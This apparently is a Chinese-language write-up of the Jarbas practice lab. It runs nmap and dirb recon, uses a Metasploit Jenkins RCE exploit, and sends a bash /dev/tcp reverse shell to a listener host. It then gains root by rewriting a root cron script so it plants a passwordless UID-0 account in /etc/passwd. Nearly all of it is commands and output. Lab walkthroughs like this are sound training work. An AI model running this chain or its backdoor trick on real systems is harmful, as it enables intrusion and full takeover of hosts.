靶场59

NMAP扫描报告

# root @ Divint3 in /home/divint3/web/blog [19:55:54] C:130
$ nmap 172.17.135.54 -O -sS -A -Pn

Starting Nmap 7.40 ( https://nmap.org ) at 2019-05-29 19:55 CST
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 19:56 (0:00:00 remaining)
Nmap scan report for 172.17.135.54
Host is up (0.0026s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 28:bc:49:3c:6c:43:29:57:3c:b8:85:9a:6d:3c:16:3f (RSA)
|_  256 a0:1b:90:2c:da:79:eb:8f:3b:14:de:bb:3f:d2:e7:3f (ECDSA)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Jarbas - O Seu Mordomo Virtual!
3306/tcp open  mysql   MariaDB (unauthorized)
8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 3 hops

TRACEROUTE (using port 256/tcp)
HOP RTT     ADDRESS
1   ...
2   4.76 ms bogon (192.168.230.30)
3   1.59 ms 172.17.135.54

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.08 seconds

可以看出 使用的是Jetty,在8080端口http://172.17.135.54:8080

# root @ Divint3 in /home/divint3/web/blog [20:15:48] 
$ dirb http://172.17.135.54:8080 > /home/divint3/ctf_chache/list.txt 

# root @ Divint3 in /home/divint3/web/blog [20:07:57] 
$ sed '/^==>.*/!d' /home/divint3/ctf_chache/list.txt
==> DIRECTORY: http://172.17.135.54:8080/assets/               
==> DIRECTORY: http://172.17.135.54:8080/git/                  
==> DIRECTORY: http://172.17.135.54:8080/assets/class/         
==> DIRECTORY: http://172.17.135.54:8080/git/class/            
==> DIRECTORY: http://172.17.135.54:8080/assets/class/class/   
==> DIRECTORY: http://172.17.135.54:8080/assets/class/classes/ 
==> DIRECTORY: http://172.17.135.54:8080/assets/class/fields/  
==> DIRECTORY: http://172.17.135.54:8080/assets/class/name/    
==> DIRECTORY: http://172.17.135.54:8080/assets/class/package/ 
==> DIRECTORY: http://172.17.135.54:8080/git/class/class/      
==> DIRECTORY: http://172.17.135.54:8080/git/class/classes/    
==> DIRECTORY: http://172.17.135.54:8080/git/class/fields/     
==> DIRECTORY: http://172.17.135.54:8080/git/class/name/       
==> DIRECTORY: http://172.17.135.54:8080/git/class/package/    
==> DIRECTORY: http://172.17.135.54:8080/assets/class/class/class/ 
==> DIRECTORY: http://172.17.135.54:8080/assets/class/class/classes/
==> DIRECTORY: http://172.17.135.54:8080/assets/class/class/fields/

# root @ Divint3 in /home/divint3/web/blog [20:15:41] C:1
$ sed -e '/^+.*/!d' /home/divint3/ctf_chache/list.txt 
+ http://172.17.135.54:8080/error (CODE:400|SIZE:5329)
+ http://172.17.135.54:8080/favicon.ico (CODE:200|SIZE:17542)
+ http://172.17.135.54:8080/login (CODE:200|SIZE:5988)
+ http://172.17.135.54:8080/logout (CODE:302|SIZE:0
+ http://172.17.135.54:8080/robots.txt (CODE:200|SIZE:71
+ http://172.17.135.54:8080/assets/dynamic (CODE:500|SIZE:13989) 

dirb发现robots.txt

# we don't want robots to click "build" links
User-agent: *
Disallow: /

先测试一下脚本

msf5 exploit(multi/http/jenkins_script_console) > search jenkins

Matching Modules
================

   #   Name                                                  Disclosure Date  Rank       Check  Description
   -   ----                                                  ---------------  ----       -----  -----------
   1   auxiliary/gather/jenkins_cred_recovery                                 normal     Yes    Jenkins Domain Credential Recovery
   2   auxiliary/scanner/http/jenkins_command                                 normal     Yes    Jenkins-CI Unauthenticated Script-Console Scanner
   3   auxiliary/scanner/http/jenkins_enum                                    normal     Yes    Jenkins-CI Enumeration
   4   auxiliary/scanner/http/jenkins_login                                   normal     Yes    Jenkins-CI Login Utility
   5   auxiliary/scanner/jenkins/jenkins_udp_broadcast_enum                   normal     No     Jenkins Server Broadcast Enumeration
   6   exploit/linux/misc/jenkins_java_deserialize           2015-11-18       excellent  Yes    Jenkins CLI RMI Java Deserialization Vulnerability
   7   exploit/linux/misc/jenkins_ldap_deserialize           2016-11-16       excellent  Yes    Jenkins CLI HTTP Java Deserialization Vulnerability
   8   exploit/linux/misc/opennms_java_serialize             2015-11-06       normal     No     OpenNMS Java Object Unserialization Remote Code Execution
   9   exploit/multi/http/jenkins_metaprogramming            2019-01-08       excellent  Yes    Jenkins ACL Bypass and Metaprogramming RCE
   10  exploit/multi/http/jenkins_script_console             2013-01-18       good       Yes    Jenkins-CI Script-Console Java Execution
   11  exploit/multi/http/jenkins_xstream_deserialize        2016-02-24       excellent  Yes    Jenkins XStream Groovy classpath Deserialization Vulnerability
   12  exploit/windows/misc/ibm_websphere_java_deserialize   2015-11-06       excellent  No     IBM WebSphere RCE Java Deserialization Vulnerability
   13  post/multi/gather/jenkins_gather                                       normal     No     Jenkins Credential Collector

使用exploit/multi/http/jenkins_metaprogramming

set rhost 172.17.135.59 
set rport 8080
set payload java/meterpreter/reverse_tcp
set lhost 172.17.135.80
set lport 4442
set ForceExploit true
run

反弹shell至本地

bash -i >& /dev/tcp/172.17.135.80/4442 0>&1


返回
# root @ Divint3 in /home/divint3 [18:58:07] C:1
$ nc -lvp 4442
listening on [any] 4442 ...
connect to [172.17.135.80] from bogon [172.17.135.59] 55308

尝试suid文件提权, 没有特定文件

发现crontab

cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1

修改目标脚本

echo "sed -i '/^root.*/a divint3::0:0:root:/root:/bin/bash'" > /etc/script/CleaningScript.sh

等待一会

su divint3
whoami
root
python -c "import pty;pty.spawn('/bin/bash')"
[root@jarbas /]# cd /root
[root@jarbas ~]# cat flag.txt
cat flag.txt
Hey!

Congratulations! You got it! I always knew you could do it!
This challenge was very easy, huh? =)

Thanks for appreciating this machine.

@tiagotvrs 



[root@jarbas ~]# cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
divint3::0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false